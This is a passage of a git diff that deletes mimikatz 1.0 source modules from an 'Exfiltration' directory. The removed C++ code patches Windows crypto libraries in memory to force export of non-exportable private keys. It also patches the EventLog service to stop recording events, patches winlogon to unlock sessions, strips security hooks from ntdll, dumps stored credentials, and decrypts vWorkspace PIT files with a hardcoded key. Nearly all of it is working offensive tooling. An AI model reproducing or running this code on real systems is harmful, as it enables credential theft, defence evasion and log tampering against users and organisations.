OFFS_WIN6_CPExportKey_4000_EXPORT = 2; -#elif defined _M_IX86 - BYTE PTRN_WIN5_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x75}; - BYTE PTRN_WIN5_CPExportKey_4000[] = {0x09, 0x40, 0x0f, 0x84}; - BYTE PATC_WIN5_CPExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WIN5_CPExportKey_4001_EXPORT = -5; - LONG OFFS_WIN5_CPExportKey_4000_EXPORT = -7; - - BYTE PTRN_WI60_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4001[] = {0x08, 0x01, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PTRN_WI60_CPExportKey_4000[] = {0x08, 0x00, 0x40, 0x0f, 0x85}; - BYTE PTRN_WIN6_CPExportKey_4000[] = {0x08, 0x00, 0x40, 0x00, 0x00, 0x0f, 0x85}; - BYTE PATC_W6AL_CPExportKey_EXPORT[] = {0x90, 0xe9}; - LONG OFFS_WI60_CPExportKey_EXPORT = 3; - LONG OFFS_WIN6_CPExportKey_EXPORT = 5; -#endif - - PBYTE ptr4001 = NULL; PBYTE pattern4001 = NULL; ULONG taillePattern4001 = 0; PBYTE patch4001 = NULL; ULONG taillePatch4001 = 0; LONG offsetPatch4001 = 0; - PBYTE ptr4000 = NULL; PBYTE pattern4000 = NULL; ULONG taillePattern4000 = 0; PBYTE patch4000 = NULL; ULONG taillePatch4000 = 0; LONG offsetPatch4000 = 0; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern4001 = PTRN_WIN5_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WIN5_CPExportKey_4001); - pattern4000 = PTRN_WIN5_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN5_CPExportKey_4000); - patch4001 = patch4000 = PATC_WIN5_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_WIN5_CPExportKey_EXPORT); - offsetPatch4001 = OFFS_WIN5_CPExportKey_4001_EXPORT; - offsetPatch4000 = OFFS_WIN5_CPExportKey_4000_EXPORT; - } - else - { -#ifdef _M_X64 - pattern4001 = PTRN_W6AL_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_W6AL_CPExportKey_4001); - patch4001 = patch4000 = PATC_W6AL_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_W6AL_CPExportKey_EXPORT); - offsetPatch4001 = OFFS_W6AL_CPExportKey_EXPORT; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern4000 = PTRN_WIN6_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN6_CPExportKey_4000); - offsetPatch4000 = OFFS_WIN6_CPExportKey_4000_EXPORT; - } - else - { - pattern4000 = PTRN_WIN8_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN8_CPExportKey_4000); - offsetPatch4000 = OFFS_W6AL_CPExportKey_EXPORT; - } -#elif defined _M_IX86 - patch4001 = patch4000 = PATC_W6AL_CPExportKey_EXPORT; taillePatch4001 = taillePatch4000 = sizeof(PATC_W6AL_CPExportKey_EXPORT); - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern4001 = PTRN_WI60_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WI60_CPExportKey_4001); - pattern4000 = PTRN_WI60_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WI60_CPExportKey_4000); - offsetPatch4001 = offsetPatch4000 = OFFS_WI60_CPExportKey_EXPORT; - } - else - { - pattern4001 = PTRN_WIN6_CPExportKey_4001; taillePattern4001 = sizeof(PTRN_WIN6_CPExportKey_4001); - pattern4000 = PTRN_WIN6_CPExportKey_4000; taillePattern4000 = sizeof(PTRN_WIN6_CPExportKey_4000); - offsetPatch4001 = offsetPatch4000 = OFFS_WIN6_CPExportKey_EXPORT; - } -#endif - } - - if(HMODULE hRSA = LoadLibrary(LIBNAME_WALL_RSA)) - { - if( mod_memory::genericPatternSearch(&ptr4001, LIBNAME_WALL_RSA, pattern4001, taillePattern4001, offsetPatch4001, FUNCNAM_WALL_EXPORT, true, true) && - mod_memory::genericPatternSearch(&ptr4000, LIBNAME_WALL_RSA, pattern4000, taillePattern4000, offsetPatch4000, FUNCNAM_WALL_EXPORT, true, true)) - { - (*outputStream) << L"Patterns CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE et CRYPT_ARCHIVABLE trouvés !" << endl << - L"Patch CRYPT_EXPORTABLE | CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4001, patch4001, taillePatch4001) ? L"OK" : L"KO") << endl << - L"Patch CRYPT_ARCHIVABLE : " << (mod_memory::writeMemory(ptr4000, patch4000, taillePatch4000) ? L"OK" : L"KO") << endl; - } - FreeLibrary(hRSA); - } - return true; -} - -bool mod_mimikatz_crypto::patchcng(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WNO8_NCrypt[] = L"ncrypt.dll"; - wchar_t LIBNAME_WIN8_NCrypt[] = L"ncryptprov.dll"; -#ifdef _M_X64 - BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x75}; - BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x43, 0x24, 0x02, 0x75}; - BYTE PTRN_WI60_SPCryptExportKey[] = {0xf6, 0x43, 0x28, 0x02, 0x0f, 0x85}; - - BYTE PATC_WI60_SPCryptExportKey_EXPORT[] = {0x90, 0xe9}; - BYTE PATC_WI60_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; - BYTE PATC_WALL_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; -#elif defined _M_IX86 - BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75}; - BYTE PTRN_WIN8_SPCryptExportKey[] = {0xf6, 0x47, 0x1c, 0x02, 0x75}; - - BYTE PATC_WNO8_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; - BYTE PATC_WIN8_SPCryptExportKey_NOEXPORT[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xeb}; -#endif - BYTE PATC_WALL_SPCryptExportKey_EXPORT[] = {0xeb}; - LONG OFFS_WALL_SPCryptExportKey_EXPORT = 4; - - if(mod_cryptong::isNcrypt) - { - if(mod_cryptong::justInitCNG()) - { - wchar_t * libName; PBYTE pattern = NULL; ULONG taillePattern = 0; PBYTE patch = NULL; ULONG taillePatch = 0; LONG offsetPatch = 0; - - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern = PTRN_WI60_SPCryptExportKey; - taillePattern = sizeof(PTRN_WI60_SPCryptExportKey); - } - else - { -#endif - pattern = PTRN_WNO8_SPCryptExportKey; - taillePattern = sizeof(PTRN_WNO8_SPCryptExportKey); -#ifdef _M_X64 - } -#endif - libName = LIBNAME_WNO8_NCrypt; - } - else - { - pattern = PTRN_WIN8_SPCryptExportKey; - taillePattern = sizeof(PTRN_WIN8_SPCryptExportKey); - libName = LIBNAME_WIN8_NCrypt; - } - - if(arguments->empty()) - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - patch = PATC_WI60_SPCryptExportKey_EXPORT; - taillePatch = sizeof(PATC_WI60_SPCryptExportKey_EXPORT); - } - else - { -#endif - patch = PATC_WALL_SPCryptExportKey_EXPORT; - taillePatch = sizeof(PATC_WALL_SPCryptExportKey_EXPORT); -#ifdef _M_X64 - } -#endif - } - else - { -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - patch = PATC_WI60_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WI60_SPCryptExportKey_NOEXPORT); - } - else - { - patch = PATC_WALL_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WALL_SPCryptExportKey_NOEXPORT); - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - patch = PATC_WNO8_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WNO8_SPCryptExportKey_NOEXPORT); - } - else - { - patch = PATC_WIN8_SPCryptExportKey_NOEXPORT; - taillePatch = sizeof(PATC_WIN8_SPCryptExportKey_NOEXPORT); - } -#endif - } - offsetPatch = OFFS_WALL_SPCryptExportKey_EXPORT; - - mod_patch::patchModuleOfService(L"KeyIso", libName, pattern, taillePattern, patch, taillePatch, offsetPatch); - } - else (*outputStream) << L"Impossible d\'initialiser la CNG : " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"Pas de CNG ?" << endl; - - return true; -} - -void mod_mimikatz_crypto::sanitizeFileName(wstring * fileName) -{ - wchar_t monTab[] = {L'\\', L'/', L':', L'*', L'?', L'\"', L'<', L'>', L'|'}; - for(wstring::iterator monIterateur = fileName->begin(); monIterateur != fileName->end(); monIterateur++) - { - for(ULONG i = 0; i < sizeof(monTab) / sizeof(wchar_t); i++) - { - if(*monIterateur == monTab[i]) - { - *monIterateur = L'~'; - break; - } - } - } -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h deleted file mode 100644 index 7d81c07..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_crypto.h +++ /dev/null @@ -1,36 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_cryptoapi.h" -#include "mod_cryptong.h" -#include "mod_crypto.h" -#include "mod_process.h" -#include "mod_patch.h" -#include <iostream> -#include <sstream> - -class mod_mimikatz_crypto -{ -private: - static void sanitizeFileName(wstring * fileName); - static void listAndOrExportCertificates(vector<wstring> * arguments, bool exportCert = false); - static void listAndOrExportKeys(vector<wstring> * arguments, bool exportKeys = false); -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool listProviders(vector<wstring> * arguments); - static bool listStores(vector<wstring> * arguments); - static bool listKeys(vector<wstring> * arguments); - static bool listCertificates(vector<wstring> * arguments); - - static bool exportCertificates(vector<wstring> * arguments); - static bool exportKeys(vector<wstring> * arguments); - - static bool patchcapi(vector<wstring> * arguments); - static bool patchcng(vector<wstring> * arguments); -}; - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp deleted file mode 100644 index 019644d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.cpp +++ /dev/null @@ -1,306 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_divers.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_divers::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(noroutemon, L"noroutemon", L"[experimental] Patch Juniper Network Connect pour ne plus superviser la table de routage")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(eventdrop, L"eventdrop", L"[super experimental] Patch l\'observateur d\'événements pour ne plus rien enregistrer")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cancelator, L"cancelator", L"Patch le bouton annuler de Windows XP et 2003 en console pour déverrouiller une session")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(secrets, L"secrets", L"Affiche les secrets utilisateur")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(nodetour, L":nodetour", L"Anti-détours SR")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pitme, L":pitme", L"Déchiffre les fichiers PIT (Quest vWorkspace Client)")); - return monVector; -} - -bool mod_mimikatz_divers::nodetour(vector<wstring> * arguments) -{ - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_2003_____x64); - mesOS.push_back(mod_patch::WINDOWS_VISTA____x64); - mesOS.push_back(mod_patch::WINDOWS_2008_____x64); - mesOS.push_back(mod_patch::WINDOWS_SEVEN____x64); - mesOS.push_back(mod_patch::WINDOWS_2008r2___x64); - - if(mod_patch::checkVersion(&mesOS)) - { - BYTE monSysEnterRetn[] = {0x0f, 0x05, 0xc3}; - BYTE monDetouredStub[] = {0x90, 0x90, 0xe9}; - - PBYTE monNTDLLptr = reinterpret_cast<PBYTE>(GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenProcess")); - if(memcmp(monNTDLLptr + 8, monDetouredStub, sizeof(monDetouredStub)) == 0) - { - (*outputStream) << L"Détour trouvé et "; - if(mod_memory::writeMemory(monNTDLLptr + 8 + sizeof(monDetouredStub) + sizeof(LONG) + *reinterpret_cast<PLONG>(monNTDLLptr + 8 + sizeof(monDetouredStub)), monSysEnterRetn, sizeof(monSysEnterRetn))) - (*outputStream) << L"patché :)"; - else - (*outputStream) << L"NON patché :("; - (*outputStream) << endl; - } - else - (*outputStream) << L"Détour non trouvé" << endl; - } - return true; -} - - -bool mod_mimikatz_divers::cancelator(vector<wstring> * arguments) -{ - vector<mod_patch::OS> mesOS; - mesOS.push_back(mod_patch::WINDOWS_XP_PRO___x86); - mesOS.push_back(mod_patch::WINDOWS_2003_____x86); - - if(mod_patch::checkVersion(&mesOS)) - { - BYTE patternCMPJMP[] = {0xff, 0xff, 0xff, 0x83, 0xff, 0x02, 0x0f, 0x84}; - BYTE patternNOP[] = {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90}; - long offsetCibleNOP = 3; - - vector<mod_process::KIWI_PROCESSENTRY32> * mesProcesses = new vector<mod_process::KIWI_PROCESSENTRY32>(); - wstring processName = L"winlogon.exe"; - - if(mod_process::getList(mesProcesses, &processName)) - { - for(vector<mod_process::KIWI_PROCESSENTRY32>::iterator leProcess = mesProcesses->begin(); leProcess != mesProcesses->end(); leProcess++) - { - mod_patch::patchModuleOfPID(leProcess->th32ProcessID, L"", patternCMPJMP, sizeof(patternCMPJMP), patternNOP, sizeof(patternNOP), offsetCibleNOP); - } - } - - delete mesProcesses; - } - return true; -} - - -bool mod_mimikatz_divers::noroutemon(vector<wstring> * arguments) -{ - //BYTE patternTestRouteMon[] = {0x83, 0xec, 0x1c, 0x55, 0x8b, 0xe9}; // 7.0 // 83 ec 1c 55 8b e9 - BYTE patternTestRouteMon[] = {0x83, 0xec, 0x14, 0x53, 0x8b, 0xd9}; // 7.1 // 83 ec 14 53 8b d9 - BYTE patternNoTestRouteMon[] = {0xb0, 0x01, 0xc2, 0x04, 0x00}; - - mod_patch::patchModuleOfService(L"dsNcService", L"", patternTestRouteMon, sizeof(patternTestRouteMon), patternNoTestRouteMon, sizeof(patternNoTestRouteMon)); - return true; -} - -bool mod_mimikatz_divers::eventdrop(vector<wstring> * arguments) -{ - wchar_t LIBNAME_WNT5_EVTLOG[] = L"eventlog.dll"; - wchar_t LIBNAME_WNT6_EVTLOG[] = L"wevtsvc.dll"; -#ifdef _M_X64 - BYTE PTRN_WNT5_PerformWriteRequest[] = {0x49, 0x89, 0x5b, 0x10, 0x49, 0x89, 0x73, 0x18}; - LONG OFFS_WNT5_PerformWriteRequest = -10; - BYTE PATC_WNT5_PerformWriteRequest[] = {0x45, 0x33, 0xed, 0xc3}; - - BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0x48, 0x8b, 0xda, 0xe8}; - LONG OFFS_WN60_Channel__ActualProcessEvent = 0; - BYTE PATC_WN62_Channel__ActualProcessEvent[] = {0xff, 0xf7, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x60, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8}; - LONG OFFS_WN62_Channel__ActualProcessEvent = 0; - - BYTE PATC_WNT6_Channel__ActualProcessEvent[] = {0xc3}; -#elif defined _M_IX86 - BYTE PTRN_WNT5_PerformWriteRequest[] = {0x89, 0x45, 0xe4, 0x8b, 0x7d, 0x08, 0x89, 0x7d}; - LONG OFFS_WNT5_PerformWriteRequest = -20; - BYTE PATC_WNT5_PerformWriteRequest[] = {0x33, 0xc0, 0xc2, 0x04, 0x00}; - - BYTE PTRN_WN60_Channel__ActualProcessEvent[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x56, 0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8}; - LONG OFFS_WN60_Channel__ActualProcessEvent = 0; - BYTE PATC_WN61_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x8b, 0x4d, 0x08, 0xe8}; - LONG OFFS_WN61_Channel__ActualProcessEvent = -(5 + 5 + 2); - BYTE PATC_WN62_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x24, 0x28, 0x64, 0xa3, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x75, 0x0c}; - LONG OFFS_WN62_Channel__ActualProcessEvent = -(5 + 1 + 1 + 1 + 3 + 1 + 6 + 5 + 2 + 3 + 2 + 1 + 2); - - BYTE PATC_WNO8_Channel__ActualProcessEvent[] = {0xc2, 0x04, 0x00}; - BYTE PATC_WIN8_Channel__ActualProcessEvent[] = {0xc2, 0x08, 0x00}; -#endif - - BYTE * PTRN_Process = NULL; DWORD SIZE_PTRN_Process = 0; - BYTE * PATC_Process = NULL; DWORD SIZE_PATC_Process = 0; - LONG OFFS_PATC_Process = 0; - wstring libEvent; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - libEvent.assign(LIBNAME_WNT5_EVTLOG); - PTRN_Process = PTRN_WNT5_PerformWriteRequest; SIZE_PTRN_Process = sizeof(PTRN_WNT5_PerformWriteRequest); - PATC_Process = PATC_WNT5_PerformWriteRequest; SIZE_PATC_Process = sizeof(PATC_WNT5_PerformWriteRequest); - OFFS_PATC_Process = OFFS_WNT5_PerformWriteRequest; - } - else - { - libEvent.assign(LIBNAME_WNT6_EVTLOG); - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - PTRN_Process = PTRN_WN60_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PTRN_WN60_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN60_Channel__ActualProcessEvent; -#ifdef _M_X64 - } -#elif defined _M_IX86 - PATC_Process = PATC_WNO8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNO8_Channel__ActualProcessEvent); - } - else if(mod_system::GLOB_Version.dwMinorVersion < 2) - { - PTRN_Process = PATC_WN61_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PATC_WN61_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN61_Channel__ActualProcessEvent; - PATC_Process = PATC_WNO8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNO8_Channel__ActualProcessEvent); - } -#endif - else - { - PTRN_Process = PATC_WN62_Channel__ActualProcessEvent; SIZE_PTRN_Process = sizeof(PATC_WN62_Channel__ActualProcessEvent); - OFFS_PATC_Process = OFFS_WN62_Channel__ActualProcessEvent; -#ifdef _M_IX86 - PATC_Process = PATC_WIN8_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WIN8_Channel__ActualProcessEvent); -#endif - } - -#ifdef _M_X64 - PATC_Process = PATC_WNT6_Channel__ActualProcessEvent; SIZE_PATC_Process = sizeof(PATC_WNT6_Channel__ActualProcessEvent); -#endif - } - - mod_patch::patchModuleOfService(L"EventLog", libEvent, PTRN_Process, SIZE_PTRN_Process, PATC_Process, SIZE_PATC_Process, OFFS_PATC_Process); - - return true; -} - -bool mod_mimikatz_divers::secrets(vector<wstring> * arguments) -{ - DWORD credNb = 0; - PCREDENTIAL * pCredential = NULL; - DWORD flags = (arguments->empty() ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS); - - if(CredEnumerate(NULL, flags, &credNb, &pCredential)) - { - (*outputStream) << L"Nombre de secrets : " << credNb << endl; - - for(DWORD i = 0; i < credNb; i++) - { - wstring type; - bool isCertificate = false; - switch(pCredential[i]->Type) - { - case CRED_TYPE_GENERIC: - type.assign(L"GENERIC"); - break; - case CRED_TYPE_DOMAIN_PASSWORD: - type.assign(L"DOMAIN_PASSWORD"); - break; - case CRED_TYPE_DOMAIN_CERTIFICATE: - type.assign(L"DOMAIN_CERTIFICATE"); - isCertificate = true; - break; - case CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: - type.assign(L"DOMAIN_VISIBLE_PASSWORD"); - break; - case CRED_TYPE_GENERIC_CERTIFICATE: - type.assign(L"GENERIC_CERTIFICAT"); - isCertificate = true; - break; - case CRED_TYPE_DOMAIN_EXTENDED: - type.assign(L"DOMAIN_EXTENDED"); - break; - default: - type.assign(L"?"); - } - - (*outputStream) << - L"TargetName : " << (pCredential[i]->TargetName ? pCredential[i]->TargetName : L"<NULL>") << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << - L"Type : " << type << L" (" << pCredential[i]->Type << L')' << endl << - L"Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << - L"UserName : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl << - L"Credential : " << mod_text::stringOrHex(pCredential[i]->CredentialBlob, pCredential[i]->CredentialBlobSize) << endl << - endl; - } - CredFree(pCredential); - } - else (*outputStream) << L"CredEnumerate : " << mod_system::getWinError() << endl; - - return true; -} - - -bool mod_mimikatz_divers::pitme(vector<wstring> * arguments) -{ - static const BYTE HARDCODED_KEY[] = { - 0x80, 0x5b, 0xe8, 0x18, 0x6f, 0x64, 0x89, 0x3a, 0x34, 0xce, 0x59, 0xdf, 0x4d, 0xb4, 0x5a, 0x0f, - 0x69, 0x94, 0x58, 0x70, 0x71, 0x4b, 0x17, 0xcf, 0xc3, 0x40, 0xaa, 0xfc, 0xc5, 0xe0, 0x21, 0xdb, - 0x9a, 0x49, 0x68, 0xb8, 0x2f, 0x4a, 0x6c, 0xdc, 0x7a, 0x8b, 0x7f, 0x5c, 0x03, 0x08, 0xfe, 0x39, - 0xa3, 0xc6, 0x31, 0xa6, 0x8c, 0xbd, 0x72, 0xa4, 0x8a, 0x1b, 0x92, 0xd5, 0x87, 0xad, 0x78, 0x8f, - 0x55, 0x96, 0x0b, 0x30, 0xa8, 0x43, 0x53, 0xb0, 0x62, 0xa0, 0xda, 0x7c, 0x13, 0x8d, 0x5d, 0x81, - 0xc0, 0x8e, 0x90, 0x88, 0xe4, 0xb7, 0x76, 0xc2, 0xb5, 0x04, 0x93, 0xa5, 0xa9, 0x9e, 0xab, 0xf5, - 0x37, 0xac, 0x99, 0x26, 0xe2, 0x38, 0x85, 0xe1, 0x74, 0x77, 0x32, 0xe5, 0x91, 0x23, 0xb1, 0x10, - 0x4c, 0x47, 0x3f, 0xbe, 0x82, 0x22, 0x6a, 0x51, 0xd0, 0x63, 0x75, 0x11, 0x33, 0x9b, 0xfb, 0x3b, - 0xca, 0xed, 0xdd, 0x44, 0xe6, 0x12, 0x4e, 0x97, 0x3c, 0x79, 0x4f, 0x41, 0x66, 0xba, 0x50, 0x0e, - 0xc9, 0x6b, 0x05, 0xee, 0x6e, 0xe7, 0x95, 0x7b, 0x60, 0x9d, 0xff, 0xc4, 0x29, 0x86, 0xb9, 0x7d, - 0x98, 0xc8, 0x9c, 0x35, 0xbb, 0xbc, 0xef, 0xfa, 0x3d, 0x06, 0xf9, 0x36, 0xbf, 0x3e, 0x7e, 0xa2, - 0xc7, 0x56, 0xae, 0xcb, 0xaf, 0xe9, 0x42, 0x61, 0xf0, 0x1d, 0xfd, 0x65, 0x9f, 0x52, 0x27, 0xea, - 0x24, 0xa1, 0xa7, 0xb2, 0x6d, 0x14, 0xb3, 0x45, 0xf8, 0xb6, 0xf7, 0x73, 0xc1, 0x83, 0x84, 0xf4, - 0xcc, 0xcd, 0xf3, 0xe3, 0x54, 0x15, 0xd1, 0x46, 0x07, 0x57, 0x2c, 0xd2, 0xd3, 0xd6, 0xd4, 0xd7, - 0xf6, 0xeb, 0xd8, 0x1c, 0x00, 0x09, 0xec, 0x67, 0x0a, 0xd9, 0x16, 0xde, 0xf1, 0xf2, 0x01, 0x2d, - 0x5e, 0x48, 0x02, 0x0c, 0x5f, 0x0d, 0x19, 0x1a, 0x28, 0x1e, 0x1f, 0x20, 0x25, 0x2a, 0x2b, 0x2e - }; - static const DWORD SUBKEY_SIZE = 16; - static const BYTE HEADER_PIT[] = {'P', 'I', 'T'}; - - FILE * monFichierSource, * monFichierDestination; - BYTE * monBuffer, * monBufferData; - ULONG tailleFichierSource, tailleData; - - if(arguments->size() < 1) - { - (*outputStream) << L"divers:::pitme file.pit [file.rdp]" << endl; - } - else - { - (*outputStream) << L" * Ouverture en lecture du fichier \'" << arguments->front() << L"\' : "; - if(monFichierSource = _wfopen(arguments->front().c_str(), L"rb")) - { - fseek(monFichierSource, 0, SEEK_END); - tailleFichierSource = ftell(monFichierSource); - monBuffer = new BYTE[tailleFichierSource]; - fseek(monFichierSource, 0, SEEK_SET); - fread(monBuffer, tailleFichierSource, 1, monFichierSource); - fclose(monFichierSource); - - (*outputStream) << L"OK" << endl << L" * Déchiffrement n°1 : "; - if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource, HARDCODED_KEY, sizeof(HARDCODED_KEY), CALG_RC4)) - { - (*outputStream) << L"OK" << endl << L" * Déchiffrement n°2 : "; - if(mod_crypto::genericDecrypt(monBuffer, tailleFichierSource - SUBKEY_SIZE, monBuffer + tailleFichierSource - SUBKEY_SIZE, SUBKEY_SIZE, CALG_RC4)) - { - (*outputStream) << L"OK" << endl << L" * En-tête : "; - if(memcmp(monBuffer, HEADER_PIT, sizeof(HEADER_PIT)) == 0) - { - (*outputStream) << L"OK" << endl; - monBufferData = monBuffer + sizeof(HEADER_PIT); - tailleData = tailleFichierSource - sizeof(HEADER_PIT) - SUBKEY_SIZE; - - if(arguments->size() > 1) - { - (*outputStream) << L" * Ouverture en écriture du fichier \'" << arguments->back() << L"\' : "; - if(monFichierDestination = _wfopen(arguments->back().c_str(), L"wb")) - { - (*outputStream) << L"OK" << endl; - fwrite(monBufferData, tailleData, 1, monFichierDestination); - fclose(monFichierDestination); - } - else (*outputStream) << L"KO" << endl; - } - else (*outputStream) << L" * Données : " << endl << endl << wstring(reinterpret_cast<char *>(monBufferData), reinterpret_cast<char *>(monBufferData + tailleData)) << endl; - } - else (*outputStream) << L"KO - différent de \'PIT\' ; " << mod_text::stringOfHex(HEADER_PIT, sizeof(HEADER_PIT)) << L" != " << mod_text::stringOfHex(monBuffer, sizeof(HEADER_PIT)) << endl; - } - else (*outputStream) << L"KO"; - } - else (*outputStream) << L"KO"; - delete [] monBuffer; - } - else (*outputStream) << L"KO" << endl; - } - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h deleted file mode 100644 index 9bfcf9f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_divers.h +++ /dev/null @@ -1,30 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_patch.h" -#include "mod_secacl.h" -#include "mod_text.h" -#include "mod_crypto.h" -#include <iostream> -#include <wincred.h> -#include "..\global.h" - -class mod_mimikatz_divers -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool cancelator(vector<wstring> * arguments); - static bool noroutemon(vector<wstring> * arguments); - static bool eventdrop(vector<wstring> * arguments); - static bool secrets(vector<wstring> * arguments); - static bool nodetour(vector<wstring> * arguments); - static bool pitme(vector<wstring> * arguments); -}; - - diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp deleted file mode 100644 index 366c062..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_efs.cpp +++ /dev/null @@ -1,300 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_efs.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_efs::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> 